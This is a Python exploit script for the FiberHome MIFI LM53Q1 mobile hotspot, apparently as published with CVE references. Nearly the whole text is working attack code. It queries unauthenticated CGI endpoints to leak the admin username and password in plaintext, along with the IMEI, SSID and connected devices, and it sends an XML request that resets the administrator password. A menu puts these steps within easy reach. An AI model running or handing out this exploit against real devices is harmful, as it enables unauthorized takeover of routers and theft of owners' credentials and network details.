FiberHome MIFI LM53Q1 Information Disclosure / Password Change

`#!/usr/bin/python  
  
# /$$$$$$$$ /$$ /$$ /$$ /$$ /$$$$$$$ /$$ /$$$$$$$$ /$$ /$$ /$$  
# | $$_____/|__/| $$ | $$ | $$ | $$__ $$ | $$ | $$_____/ | $$ |__/ | $$  
# | $$ /$$| $$$$$$$ /$$$$$$ /$$$$$$ | $$ | $$ /$$$$$$ /$$$$$$/$$$$ /$$$$$$ | $$ \ $$ /$$$$$$ /$$$$$$/$$$$ /$$$$$$ /$$$$$$ /$$$$$$ | $$ /$$ /$$ /$$$$$$ | $$ /$$$$$$ /$$ /$$$$$$  
# | $$$$$ | $$| $$__ $$ /$$__ $$ /$$__ $$| $$$$$$$$ /$$__ $$| $$_ $$_ $$ /$$__ $$ | $$$$$$$/ /$$__ $$| $$_ $$_ $$ /$$__ $$|_ $$_/ /$$__ $$ | $$$$$ | $$ /$$/ /$$__ $$| $$ /$$__ $$| $$|_ $$_/  
# | $$__/ | $$| $$ \ $$| $$$$$$$$| $$ \__/| $$__ $$| $$ \ $$| $$ \ $$ \ $$| $$$$$$$$ | $$__ $$| $$$$$$$$| $$ \ $$ \ $$| $$ \ $$ | $$ | $$$$$$$$ | $$__/ \ $$$$/ | $$ \ $$| $$| $$ \ $$| $$ | $$  
# | $$ | $$| $$ | $$| $$_____/| $$ | $$ | $$| $$ | $$| $$ | $$ | $$| $$_____/ | $$ \ $$| $$_____/| $$ | $$ | $$| $$ | $$ | $$ /$$| $$_____/ | $$ >$$ $$ | $$ | $$| $$| $$ | $$| $$ | $$ /$$  
# | $$ | $$| $$$$$$$/| $$$$$$$| $$ | $$ | $$| $$$$$$/| $$ | $$ | $$| $$$$$$$ | $$ | $$| $$$$$$$| $$ | $$ | $$| $$$$$$/ | $$$$/| $$$$$$$ | $$$$$$$$ /$$/\ $$| $$$$$$$/| $$| $$$$$$/| $$ | $$$$/  
# |__/ |__/|_______/ \_______/|__/ |__/ |__/ \______/ |__/ |__/ |__/ \_______/ |__/ |__/ \_______/|__/ |__/ |__/ \______/ \___/ \_______/ |________/|__/ \__/| $$____/ |__/ \______/ |__/ \___/  
# | $$  
# | $$  
# |__/  
# Exploit Title: FiberHome MIFI LM53Q1 Multiple Vulnerabilities  
# Exploit Author: Ibad Shah  
# Vendor Homepage: www.fiberhome.com  
# Version: VH519R05C01S38  
# Tested on: Linux  
# Platform : Hardware  
# CVE : CVE-2017-16885, CVE-2017-16886, CVE-2017-16887  
# Greetz : Taimoor Zafar, Jawad Ahmed, Owais Mehtab, Aitezaz Mohsin, ZHC  
  
import requests,sys,getopt,socket,struct  
  
#Declaring IP as our global variable to probe for Gateway IP of Device  
global ip  
  
#Getting Gateway IP Address  
def get_default_gateway_linux():  
with open("/proc/net/route") as fh:  
for line in fh:  
fields = line.strip().split()  
if fields[1] != '00000000' or not int(fields[3], 16) & 2:  
continue  
return socket.inet_ntoa(struct.pack("<L", int(fields[2], 16)))  
return;  
  
  
ip = get_default_gateway_linux()  
  
exploit_title = "=============================================== \n FiberHome Remote Administrator Account Details \n================================================";  
  
  
#Function to get Device Statistics   
def get_device_details():  
  
gateway = None  
hardware = None  
device_name = None  
devices_all = ''  
version = None  
gateway = None  
ssid = ''  
dns1 = None  
dns2 = None  
  
  
requestStatus = requests.get("http://192.168.8.1/xml_action.cgi?method=get&module=duster&file=status1")  
api_response = requestStatus.content.replace('\t','').split('\n')  
for results in api_response:  
if "<hardware_version>" in results:  
hardware = results.replace('<hardware_version>','').replace('</hardware_version>','').replace(' ','').replace('\n','')  
if "<device_name>" in results:  
device_name = results.replace('<device_name>','').replace('</device_name>','').replace(' ','').replace('\n','')  
if "<version_num>" in results:  
version = results.replace('<version_num>','').replace('</version_num>','').replace(' ','').replace('\n','')  
if "<gateway>" in results:  
gateway = results.replace('<gateway>','').replace('</gateway>','').replace(' ','').replace('\n','')  
if "<ssid>" in results:  
ssid = results.replace('<ssid>','').replace('</ssid>','').replace('\n','')  
if "<dns1>" in results:  
dns1 = results.replace('<dns1>','').replace('</dns1>','').replace(' ','').replace('\n','')  
if "<dns2>" in results:  
dns2 = results.replace('<dns2>','').replace('</dns2>','').replace(' ','').replace('\n','')  
if "<IMEI>" in results:  
imei = results.replace('<IMEI>','').replace('</IMEI>','').replace(' ','').replace('\n','')  
print "\n=============================================="  
  
print "\nHardware Version of Device : "+hardware+"\n"  
print "\nName of Device : "+device_name+"\n"  
print "\nSoftware Version of Device : "+version+"\n"  
print "\nIMEI of Device! : "+imei+"\n"  
print "\nWiFi SSID of Device : "+ssid+"\n"  
print "\nGateway of Zong Device : "+gateway+"\n"  
print "\nDNS Primary of Device : "+dns1+"\n"  
print "\nDNS Secondary of Device : "+dns2+"\n"  
print "\n=============================================================================\n";  
if "<known_devices_list>" in results:  
devices_all = results.replace('<known_devices_list>','').replace('</known_devices_list>','').replace('\n','')  
print "\nConnected Devices to WIFI\n"  
print devices_all  
  
  
#Function for getting User Account Details to login to Portal  
def get_user_account_details():  
request = requests.get("http://"+ip+"/xml_action.cgi?method=get&module=duster&file=admin")  
admin_details = request.content.replace('\t','').split('\n')  
for admin_login_response in admin_details:  
if "<router_username>" in admin_login_response:  
username = admin_login_response.replace('<router_username>','').replace('</router_username>','')  
if "<router_password>" in admin_login_response:  
password = admin_login_response.replace('<router_password>','').replace('</router_password>','')  
print "\nUsername of Device Web Application :\n"+username+" "  
print "Password of Device Web Application :\n"+password+"\n"  
print "\n=============================================================================\n";  
  
  
#Function to change Administrator Password   
  
def change_admin_password():  
set_password = raw_input("\nEnter Password to Change : ")  
password = str(set_password)  
xml = "<?xml version='1.0' encoding='UTF-8'?><RGW><management><router_password>"+password+"</router_password></management></RGW>"  
headers = {'Content-Type': 'application/xml'}   
change_password_request = requests.post("http://"+ip+"/xml_action.cgi?method=set&module=duster&file=admin", data=xml, headers=headers).text  
print "Password Changed!"  
  
  
def main():  
  
print exploit_title  
print "\nSelect Menu For Fetching Details \n \n 1. Get Portal Login & Password. \n 2. Get Other Details. \n 3. Change Admin Password for Device"  
  
get_option = raw_input("\n Enter Option : ");  
  
option = int(get_option)  
  
if get_option == "1":  
  
get_user_account_details()  
  
raw_input("\n Press Any Key To Exit");  
  
elif get_option == "2":  
  
get_device_details()  
  
raw_input("\n Press Any Key To Exit");  
  
elif get_option == "3":  
  
change_admin_password()  
  
elif get_option == "":  
  
print "Good Bye!";  
  
else:  
  
print "Goodbye!";  
  
main()  
`